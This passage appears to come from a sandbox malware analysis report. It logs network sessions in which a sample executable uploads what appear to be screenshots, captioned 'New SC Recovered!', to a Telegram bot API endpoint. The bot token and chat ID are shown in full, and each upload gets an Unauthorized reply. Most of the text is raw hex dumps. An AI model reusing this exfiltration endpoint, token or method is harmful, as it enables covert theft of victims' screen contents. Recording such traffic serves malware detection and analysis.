34 39 0a 55 73 65 72 Data Ascii: -----------------------------8dcbf70b25255b6Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcbf70b25255b6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/18/2024 10:19:49User
2024-07-25 22:00:59 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:00:59 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:00:59 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:00:59 UTC	7423	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:00:59 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 66 37 30 62 32 35 32 35 35 62 36 2d 2d 0d 0a Data Ascii: -----------------------------8dcbf70b25255b6--
2024-07-25 22:00:59 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:00:59 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49732	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:11 UTC	238	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcc56227d5fe15 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue
2024-07-25 22:01:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:11 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 35 36 32 32 37 64 35 66 65 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 35 36 32 32 37 64 35 66 65 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 36 2f 32 30 32 34 20 30 30 3a 30 30 3a 34 33 0a 55 73 65 72 Data Ascii: -----------------------------8dcc56227d5fe15Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcc56227d5fe15Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/26/2024 00:00:43User
2024-07-25 22:01:11 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:11 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:11 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:11 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:11 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 35 36 32 32 37 64 35 66 65 31 35 2d 2d 0d 0a Data Ascii: -----------------------------8dcc56227d5fe15--
2024-07-25 22:01:11 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:11 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49733	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:18 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcc9f9cbbe4ea1 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:18 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 66 39 63 62 62 65 34 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 66 39 63 62 62 65 34 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 33 31 2f 32 30 32 34 20 32 30 3a 30 36 3a 32 35 0a 55 73 65 72 Data Ascii: -----------------------------8dcc9f9cbbe4ea1Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcc9f9cbbe4ea1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/31/2024 20:06:25User
2024-07-25 22:01:18 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:18 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:01:18 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:01:18 UTC	7412	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:01:18 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 39 66 39 63 62 62 65 34 65 61 31 2d 2d 0d 0a Data Ascii: -----------------------------8dcc9f9cbbe4ea1--
2024-07-25 22:01:19 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:01:19 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49734	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:01:20 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dccc3999cbfb48 Host: api.telegram.org Content-Length: 57551 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:01:20 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:01:20 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 63 33 39 39 39 63 62 66 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 63 33 39 39 39 63 62 66 62 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 33 2f 32 30 32 34 20 31 36 3a 34 38 3a 31 30 0a 55 73 65 72 Data Ascii: -----------------------------8dccc3999cbfb48Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dccc3999cbfb48Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/03/2024 16:48:10User
2024-07-25 22:01:20 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:01:20 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
